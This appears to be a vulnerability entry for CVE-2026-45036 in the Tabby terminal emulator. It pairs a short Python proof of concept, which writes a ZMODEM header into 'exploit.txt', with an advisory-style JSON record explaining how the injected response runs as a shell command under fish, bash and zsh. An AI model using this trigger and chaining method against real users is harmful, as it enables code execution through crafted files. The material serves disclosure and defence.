CVE-2026-45036

# PoC: Generate a file to trigger ZMODEM detection in Tabby < 1.0.233 # This file simulates the ZRQINIT header. # When a user runs 'cat' on this file in a vulnerable Tabby terminal, # Tabby will inject a response back into the shell. payload = b"**\x18B00000000000000\r\n\x11" with open("exploit.txt", "wb") as f: f.write(payload) print("File 'exploit.txt' created.") print("To simulate the attack chain (requires specific shell setup):") print("1. Place this file in a directory.") print("2. In a vulnerable Tabby terminal, run: cat exploit.txt") print("3. Close/Exit the cat command.") print("4. The injected response from Tabby is executed by the shell.")

{"cve": {"id": "CVE-2026-45036", "sourceIdentifier": "[email protected]", "published": "2026-05-15T17:16:48.487", "lastModified": "2026-05-15T18:16:25.953", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tabby (formerly Terminus) is a highly configurable terminal emulator. Prior to 1.0.233, Tabby before 1.0.233 automatically confirms ZMODEM protocol detection on all terminal session output without user interaction, enabling shell command execution when a user displays attacker-controlled content. The ZModemMiddleware in tabby-terminal consumes all session output through a Zmodem.Sentry, and when a ZMODEM ZRQINIT header is detected, unconditionally calls detection.confirm() and writes a fixed ZRINIT response ( **\\x18B0100000023be50\\r\\n\\x11) back into the active PTY as input. When the process that triggered the detection (e.g., cat) exits, the injected bytes are consumed by the user's shell as a command line. Under fish (default configuration), the ** prefix triggers recursive glob expansion against the current directory, allowing an attacker-placed executable at a matching nested path (e.g., d/xB0100000023be50) to be executed by relative pathname without relying on PATH. Under bash and zsh, a secondary xterm.js terminal color-query feedback (OSC 10) can be combined in the same file to inject a slash-containing command word that similarly bypasses PATH resolution. An attacker can exploit this by providing a crafted file (e.g., in a cloned Git repository) that a user displays with cat, achieving code execution with no interaction beyond viewing the file. This vulnerability is fixed in 1.0.233."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://github.com/Eugeny/tabby/security/advisories/GHSA-qr3x-j8g9-xhf6", "source": "[email protected]"}, {"url": "https://github.com/Eugeny/tabby/security/advisories/GHSA-qr3x-j8g9-xhf6", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}